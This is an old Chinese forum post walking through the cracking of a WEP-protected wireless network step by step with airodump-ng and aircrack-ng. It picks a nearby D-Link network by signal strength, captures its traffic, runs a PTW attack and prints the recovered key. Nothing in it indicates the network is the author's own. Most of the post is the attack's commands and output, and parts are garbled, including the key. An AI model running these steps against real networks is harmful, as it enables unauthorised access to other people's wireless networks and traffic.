论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2010-12-20 21:46 |只看该作者 |倒序浏览

一、系统介绍
1、硬件thinkpad  E40.
2、软件RHEL5.5升级至2.6.36；破解工具airodump-ng, aircrack-ng;
二、过程
1，运行airodump-ng寻破解对象
[root@czgy ~]# airodump-ng wlan0

                                    图一
图一中PWR为－15的即为目标。
2、抓包
[root@czgy ~]# airodump-ng -c 1 --bssid  00:26:5A:2A:10:A8 -w test wlan0
-c后跟的是channel数，00:26:5A:2A:10:A8为目标的MAC地址，见图一
CH  1 ][ Elapsed: 16 mins ][ 2010-12-20 21:45

BSSID             PWR RXQ  Beacons #Data, #/s  CH  MB ENC  CIPHER AUTH

00:26:5A:2A:10:A8  -74 100    9769 22669  108 1  54e. WEP  WEP

BSSID             STATION          PWR Rate Lost  Packets  Probes

00:26:5A:2A:10:A8  00:12:F0:76:32:47  -20 9e- 9    0 28262
00:26:5A:2A:10:A8  00:1D:0F:01

F:30  -86 9e- 7e 806 18605

[root@czgy linuxqq_v1.0.2-beta1_i386]#

3、解包
[root@czgy ~]# aircrack-ng test*.cap
Opening test-01.cap
Read 28184 packets.

#  BSSID             ESSID                   Encryption

1  00:26:5A:2A:10:A8  Dlink_Network          WEP (22203 IVs)

Choosing first network as target.

Opening test-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 22207 ivs.

                              Aircrack-ng 1.1

            [00:00:00] Tested 246 keys (got 22207 IVs)

KB depth byte(vote)
0 0/  2 5A(29952) E1(2892

43(27904) D3(2764

30(27136)
1 0/  1 37(31232) EF(27392) E2(27136) B0(26880) D6(26880)
2 0/  5 DD(29952) 02(29440) 1F(28672) 20(28672) D6(28160)
3 1/  3 D2(30464) 75(2892

5A(27904) F0(27136) 48(26880)
4 4/ 12 41(27904) 2F(2764

4D(27392) 53(27392) 6B(26880)

KEY FOUND! [ 5A:37

D:07:41 ]
Decrypted correctly: 100%

文库|博客

返回列表

Chinaunix › 论坛 › IT运维 › 数据安全 › 实战wep破解过程（有图）

实战wep破解过程（有图） [复制链接]

浏览过的版块